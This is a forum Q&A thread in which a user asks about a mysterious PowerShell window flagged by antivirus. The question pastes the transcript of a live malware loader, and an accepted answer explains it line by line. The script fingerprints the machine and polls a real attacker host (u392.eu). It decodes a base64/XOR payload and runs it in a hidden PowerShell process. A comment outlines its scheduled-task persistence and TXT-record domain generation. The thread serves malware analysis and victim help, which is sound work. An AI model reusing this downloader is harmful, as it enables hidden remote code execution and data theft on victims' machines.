# Powershell script running randomly (harmfull)

Tags: powershell, shell, security, networking

**so it happend the at random time on my day a powershell window pop and close right away, than my antivirus (norton) alerted me.**

- Category: Intrusion Prevention
- Date & Time: 09/09/2023 02:29:12
- Risk: High
- Activity: An intrusion attempt by 172.64.142.7 was blocked.
- Status: Blocked
- Recommended Action: No Action Required
- IPS Alert Name: System Infected: Trojan.Backdoor Activity 748
- Default Action: No Action Required
- Action Taken: No Action Required
- Attacking Computer: 172.64.142.7, 80
- Attacker URL: http://u392.eu/api/v1/A524F999A3E9191FAE6BA5E3758DD2DC8AD4E10D75DE6E5A0C8E4749C8D4E695
- Destination Address: <mymachine><myip>
- Source Address: 172.64.142.7
- Traffic Description: TCP, www-http
- Network traffic from <b>http://u392.eu/api/v1/A524F999A3E9191FAE6BA5E3758DD2DC8AD4E10D75DE6E5A0C8E4749C8D4E695%5C%5C%5C</b> matches the signature of a known attack.  The attack was resulted from \DEVICE\HARDDISKVOLUME7\WINDOWS\SYSTEM32\WINDOWSPOWERSHELL\V1.0\POWERSHELL.EXE.  To stop being notified for this type of traffic, in the <b>Actions</b> panel, click <b>Stop Notifying Me</b>.

so i changed my powershell settings to transcript everypowershell sessions
thats what it transcripted:

```
**********************

Windows PowerShell transcript start
Start time: 20230909022349
Username: \<myuser\>
RunAs User: \<myuser\>
Configuration Name:
Machine: \<mymachine\>(Microsoft Windows NT 10.0.19045.0)
Host Application: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Version 5.1 -s -NoLogo -NoProfile
Process ID: 7128
PSVersion: 5.1.19041.3031
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.19041.3031
BuildVersion: 10.0.19041.3031
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1

**********************

PS\>\[Security.Cryptography.SHA256\]$sha = \[Security.Cryptography.SHA256\]::Create()
$macguid = (Get-ItemProperty (((\[regex\]::Matches('yhpargotpyrC\\tfosorciM\\ERAWTFOS:MLKH','.','RightToLeft') | ForEach {$\_.value}) -join '')) -Name MachineGuid).MachineGUID;
$userid = "$($env:USERDOMAIN)$($env:USERNAME)$($env:PROCESSOR_REVISION)$($env:PROCESSOR_IDENTIFIER)$($env:PROCESSOR_LEVEL)$($env:NUMBER_OF_PROCESSORS)$($macguid)";
$guid = ($sha.ComputeHash(\[Text.Encoding\]::UTF8.GetBytes($userid)) | ForEach-Object ToString X2) -join '';
while ($true) {
try {
$r = Invoke-RestMethod -Uri "http://u392.eu/api/v1/$($guid)"
if ($r -ne '') {
$buf = \[Convert\]::FromBase64String($r);
for ($i = 0; $i -lt $buf.Length; $i++) {
$buf\[$i\] = $buf\[$i\] -bxor 22;
}
$lines = \[Text.Encoding\]::ASCII.GetString($buf).Split("`r`n");
$p = \[Diagnostics.Process\]::new();
$p.StartInfo.WindowStyle = 'Hidden';
$p.StartInfo.FileName = 'powershell.exe';
$p.StartInfo.UseShellExecute = $false;
$p.StartInfo.RedirectStandardInput = $true;
$p.StartInfo.RedirectStandardOutput = $true;
$p.Start();
$p.BeginOutputReadLine();
foreach ($line in $lines) {
$p.StandardInput.WriteLine($line);  
}
$p.StandardInput.WriteLine('');  
$p.WaitForExit();
break;
}
}
catch {
}
Start-Sleep 2
}

PS\>TerminatingError(Invoke-RestMethod): "The underlying connection was closed: An unexpected error occurred on a send." (until i terminate powershell in the task manger it would spam that error)
```

**i will appriciate any help but i mainly asking about the powershell script**

explanation and a help for solving the problem

Comment: Your system is already in the hands of a most probably malicious attacker, you should reinstall Windows asap.

Comment: I think this question  might be good for tracking this current attack vector. It placed itself in `%System32%\Tasks\Microsoft\Windows\Windows Activation Technologies` as `jQi0kXya2` for me, invoked as a scheduled task on `LogOn` and `Registration`. It executes a hidden ps window with a script in my `%System32%` directory, a list of urls derived from words `wmail`, `fairu`, `bideo`, `privatproxy`, `ahoravideo`, etc - and formed domains using five suffixes and `.com` or `.xyz`, it then got `TXT` records, decompressed base64 on them, verified a signature, and executed their payloads above.

Comment: Using Microsoft's PSTools, you can invoke a powershell as the system, and force it to show the window it opened by pinvokiing `ShowWindowAsync(hWnd, 5)` on the associated handle from the process, mine looked like this: https://i.imgur.com/pXxdrFP.png .

Comment: Thank you I'll try it, if It will be necessary I'll ask for more help

Comment: firstly is this a command. "ShowWindowAsync(hWnd, 5)", secondly i did found something like ur picture its name is similar 20AAA962-0312-46F5-BF87-A7D273EBF793 and the errors are the smae' how did u resolved it? if im mistaken please correct me

Answer (score 4, accepted):

It definitely *seems* malicious--the script is trying very hard not to let  anyone figure out what it's doing.

I'll try to explain as best I can what each line is doing:

**___**

```
[Security.Cryptography.SHA256]$sha =[Security.Cryptography.SHA256]::Create()
```

Creates a SHA 256 object for hashing text. This is basically using a complicated math problem to turn some text into a bunch of "random" characters.

**___**

```
$macguid = (Get-ItemProperty ((([regex]::Matches('yhpargotpyrC\\tfosorciM\\ERAWTFOS:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')) -Name MachineGuid).MachineGUID
```

Gets your computer's GUID (basically a unique ID for each computer) from the registry. This is the first indication that it's malicious, because they intentionally typed the registry path (`HKLM:SOFTWARE\Microsoft\Cryptography`) backward to disguise it and used the `RightToLeft` regex to flip it back to normal.

**___**

```
$userid = "$($env:USERDOMAIN)$($env:USERNAME)$($env:PROCESSOR_REVISION)$($env:PROCESSOR_IDENTIFIER)$($env:PROCESSOR_LEVEL)$($env:NUMBER_OF_PROCESSORS)$($macguid)"
```

Gets your domain name, username, your CPU (processor) type, number of CPUs , and your computer GUID from earlier. Basically looks like this:

```
contoso.comUser1a600Intel64 Family 6 Model 166 Stepping 0, GenuineIntel6724d2b3499-75c6-9fe7-9a51-428670b3ea5e
```

**___**

```
$guid = ($sha.ComputeHash([Text.Encoding]::UTF8.GetBytes($userid)) | ForEach-Object ToString X2) -join ''
```

Takes all of the above information and creates a hash using the SHA 256 object from the beginning, which it can send back to their servers so they can decode and use the information.

**___**

```
while ($true) {
    try {
```

This is starting a `while` loop, which means it'll keep running forever until the script is stopped. The `try` statement means if whatever commands run after fail, it'll stop and not continue the rest of the commands. But it's still within the while loop, so it'll circle back and try again.

**___**

```
$r = Invoke-RestMethod -Uri "http://u392.eu/api/v1/$($guid)"
```

This is the most concerning part. It's sending the information it pulled about your computer, your username, domain, GUID, etc out to that URL (presumably their server) and the server will send a response back to your computer. The response, as you'll see below, is another PowerShell script. Since we can't see *that* script, we don't know what it's trying to do but we can assume it's malicious.

**___**

```
if ($r -ne '') {
    $buf = [Convert]::FromBase64String($r)
```

If PowerShell received a response from their server it decodes that response.

**___**

```
for ($i = 0; $i -lt $buf.Length; $i++) {
    $buf[$i] = $buf[$i] -bxor 22;
}
$lines = [Text.Encoding]::ASCII.GetString($buf).Split("`r`n")
```

This loops through the response, which is another PowerShell script, and further decodes each line to turn it into a runnable script.

**___**

```
$p = [Diagnostics.Process]::new()
$p.StartInfo.WindowStyle = 'Hidden'
$p.StartInfo.FileName = 'powershell.exe'
$p.StartInfo.UseShellExecute = $false
$p.StartInfo.RedirectStandardInput = $true
$p.StartInfo.RedirectStandardOutput = $true
$p.Start()
$p.BeginOutputReadLine()
```

Here they start a new PowerShell instance and ensure it's hidden so you won't see it on your screen.

**___**

```
foreach ($line in $lines) {
    $p.StandardInput.WriteLine($line)
}
$p.StandardInput.WriteLine('') 
$p.WaitForExit()
```

Takes the PowerShell script decoded earlier and runs it, line by line.

**___**

```
Start-Sleep 2
```

Pauses the script for 2 seconds before restarting.

---

Again, since we can't see the other script they tried to run on your machine, we can't know what all they were trying to do but this definitely seems like a malicious attack.

Comment: I formated my drive a while ago because of weird behave of my computer, I don't know if it's connected but can the back door be on my network and not local only? , also anyone knows how to check that url or what can I do against it